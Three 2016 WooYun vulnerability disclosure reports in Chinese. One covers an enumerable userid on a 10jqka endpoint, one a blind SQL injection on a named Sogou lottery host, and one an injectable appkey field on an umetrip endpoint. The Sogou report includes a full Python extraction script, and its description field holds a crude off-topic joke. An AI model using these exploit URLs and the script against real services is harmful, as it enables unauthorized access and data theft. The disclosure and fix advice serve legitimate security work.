漏洞详情披露状态： 2016-04-24： 细节已通知厂商并且等待厂商处理中2016-04-24： 厂商已经确认，细节仅向厂商公开2016-05-04： 细节向核心白帽子及相关领域专家公开2016-05-14： 细节向普通白帽子公开2016-05-24： 细节向实习白帽子公开2016-06-08： 细节向公众公开简要描述：同花顺某处鉴权可被遍历导致用户信息泄露详细说明：http://cats.10jqka.com.cn/catreqtype=cs_query_func_list&userid=11122233&cf_id=203&resp=xml&encoding=gbk&Cfg_id=1&showorder=1userid 可以任意遍历，cf_id 产品id 也可以任意遍历userid 任意修改，就能查询任意用户的购买产品信息code 区域<?xml version="1.0" encoding="GBK"?> <cs_query_func_list> <ret code="0" msg="查询成功" systime="2016-04-24 10:56:32"/> <item cf_id="203" cf_name="手机股票池高端组合" cg_id="-17" cfg_id="32" cfg_name="手机股票池高端组合" cf_valid="1" context="8d0ee96c753a18cc8f96dc8502318999" cf_presume="0" cf_price="1,968.00" cf_unit="年" order_all_code="false" sale_num="5" useable="0" min_price="1968"/> </cs_query_func_list> 漏洞证明：  修复方案：做访问控制版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-24 13:00厂商回复：你好，漏洞已确认，正在进行修复，谢谢。最新状态：暂无

漏洞详情披露状态： 2016-04-23： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：一小乞丐在拾荒时捡到个神灯，他擦了擦竟然出来了个灯神。灯神对小乞丐说能满足他一个愿望，小乞丐想了想对灯神说：我想要士力架！话刚说完，小乞丐的下面就留出了鲜红的血液，小乞丐无助的望着灯神，灯神无奈的对他说：是你要试的……详细说明：站点：t.cp.sogou.com 为True时：为Flase时：database()长度为10 漏洞证明：# -*- coding: utf8 -*-#encoding=utf-8import httplibimport timeimport stringimport sysimport urllibimport urllib2headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','Content-Type':'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive MySQL database()' % time.strftime('%H:%M:%S', time.localtime())database = ''for i in range(1,11,1):for payload in payloads:try:params = urllib.urlencode({'lotType': 'guangdong where ascii(substr(database(),'+str(i)+',1))='+str(ord(payload))+'#'})conn = httplib.HTTPConnection('t.cp.sogou.com', timeout=20)conn.request(method='POST', url="/yllt/ylltTool11x5/ltTool11x5/dataFile.php",body=params,headers=headers)status = conn.getresponse().statusif status == 500:database += payloadprint '\r[scan in progress]' ,database time.sleep(0.01)breakconn.close()except Exception, e:print eprint ''print 'database() is', database修复方案：预编译处理版权声明：转载请注明来源 Vinc@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-27 18:42厂商回复：感谢支持最新状态：暂无

漏洞详情披露状态： 2016-05-13： 细节已通知厂商并且等待厂商处理中2016-05-13： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-13： 厂商已经主动忽略漏洞，细节向公众公开简要描述：sqlin详细说明：安卓端抓包 code 区域http://ume3.umetrip.com/razor-master/cobub/index.php?/ums/postClientDatapostdatacode 区域content={"deviceid":"12dee86ad67b1b0b9ac4628f779568c7","os_version":"5.1","platform":"android","language":"zh","appkey":"29e8c090006a4db03fd297a611b4d73b"}appkey字段漏洞证明：插几个图证明一下。    修复方案：所有用户提交的数据都是危险的！过滤！版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-13 14:50厂商回复：用户提交的数据目前没有直接过滤，目前这部分数据没有直接入库，在后续的数据分析中做了一定的过滤，后续完善最新状态：暂无